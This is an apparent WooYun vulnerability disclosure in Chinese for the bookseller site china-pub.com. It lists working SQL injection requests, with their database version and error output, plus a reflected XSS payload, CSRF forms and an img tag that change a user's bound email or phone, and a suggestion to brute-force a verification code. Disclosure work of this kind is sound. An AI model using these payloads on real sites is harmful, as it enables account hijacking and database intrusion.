当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019926

漏洞标题:中国互动出版网SQL注入等漏洞

相关厂商:中国互动出版网

漏洞作者: blast

提交时间:2013-03-12 12:47

修复时间:2013-04-26 12:47

公开时间:2013-04-26 12:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入漏洞、csrf修改绑定邮箱、反射型xss等

详细说明:

SQL注入:
http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 and 1=(select @@VERSION)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
GET请求CSRF:
http://www.china-pub.com/member/mypub2010/user/userchanges_ajax.asp?act=yzemail&[email protected]
XSS:
http://www.china-pub.com/member/mypub2010/user/ver_tel.asp?mobile=&yzm=%22%3E%3Ciframe%20src=http://g.cn%3E
绑定手机号CSRF,发送验证码的操作可以通过XSS调用:

<form action="http://www.china-pub.com/member/mypub2010/user/ver_tel.asp" method="post">
<input name="ym" value="3124"/>
<input name="yz" value="2"/>
<input name="x" value="65"/>
<input name="y" value="26" type="submit"/>
</form>


利用上面的XSS从1-10000头到尾POST一遍估计就出来了

漏洞证明:

http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 and 1=(select @@VERSION)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 And 1=(select db_name())
dbinfo
http://member.china-pub.com/Car/OrderDetail.aspx?y=2013&s=5&o=4206136%20OR%204206137%22--
字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未闭合的引号。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有语法错误。
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: 字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未闭合的引号。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有语法错误。

f1.png


改邮箱:
<img src="http://www.china-pub.com/member/mypub2010/user/userchanges_ajax.asp?act=yzemail&[email protected]">

修复方案:

关闭错误回显
检查请求来源

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝